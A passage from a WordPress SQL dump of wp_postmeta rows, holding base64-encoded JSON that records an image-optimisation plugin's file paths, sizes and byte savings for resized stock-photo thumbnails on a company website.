cL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MTEsInRpbWUiOjE0ODM1ODM0NDQsImlkIjo3Mjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MzUsInRpbWUiOjE0ODM1ODM0NDgsImlkIjo3Mjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NDIsInRpbWUiOjE0ODM1ODM0NTEsImlkIjo3Mjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5ODksInRpbWUiOjE0ODM1ODM0NTUsImlkIjo3Mjh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQ0MywidGltZSI6MTQ4MzU4MzQ1OCwiaWQiOjcyOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185ODAzODgyOS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185ODAzODgyOS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185ODAzODgyOS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NTMxLCJ0aW1lIjoxNDgzNTgzNDYxLCJpZCI6NzI4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo2MzAsInRpbWUiOjE0ODM1ODM0NjUsImlkIjo3Mjh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY5NCwidGltZSI6MTQ4MzU4MzQ2OCwiaWQiOjcyOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185ODAzODgyOS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185ODAzODgyOS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185ODAzODgyOS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NzU0LCJ0aW1lIjoxNDgzNTgzNDcyLCJpZCI6NzI4fV0='); 
INSERT INTO `wp_postmeta` VALUES (30051, 727, 'wpfc_optimisation_reduction', '2694977'); 
INSERT INTO `wp_postmeta` VALUES (30052, 727, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLmpwZyIsIndpZHRoIjoyNzkyLCJoZWlnaHQiOjE5NjAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTM3MzUxMjEuanBnIiwicmVkdWN0aW9uIjoyNjk0OTY0LCJ0aW1lIjoxNDgzNTgzNDg0LCJpZCI6IjcyNyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNDg2LCJpZCI6NzI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MzczNTEyMS04MDB4NTYyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTYyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MzczNTEyMS04MDB4NTYyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MzczNTEyMS04MDB4NTYyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MzQ4OSwiaWQiOjcyN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTM3MzUxMjEtNzY4eDUzOS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUzOSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTM3MzUxMjEtNzY4eDUzOS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTM3MzUxMjEtNzY4eDUzOS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM0OTIsImlkIjo3Mjd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTE2MDB4MTEyMy5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMTIzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MzczNTEyMS0xNjAweDExMjMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTE2MDB4MTEyMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM0OTYsImlkIjo3Mjd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNDk4LCJpZCI6NzI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MzczNTEyMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MzczNTEyMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MzczNTEyMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MzUwMSwiaWQiOjcyN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTM3MzUxMjEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTM3MzUxMjEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTM3MzUxMjEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM1MDMsImlkIjo3Mjd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNTA2LCJpZCI6NzI3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNTA4LCJpZCI6NzI3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNTExLCJpZCI6NzI3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNTEzLCJpZCI6NzI3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNTE2LCJpZCI6NzI3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzNzM1MTIxLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNTE4LCJpZCI6NzI3fV0='); 
INSERT INTO `wp_postmeta` VALUES (30053, 726, 'wpfc_optimisation_reduction', '11867'); 
INSERT INTO `wp_postmeta` VALUES (30054, 726, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MzUyMywiaWQiOiI3MjYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTg5LCJ0aW1lIjoxNDgzNTgzNTI3LCJpZCI6NzI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6OTkwLCJ0aW1lIjoxNDgzNTgzNTMxLCJpZCI6NzI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My03N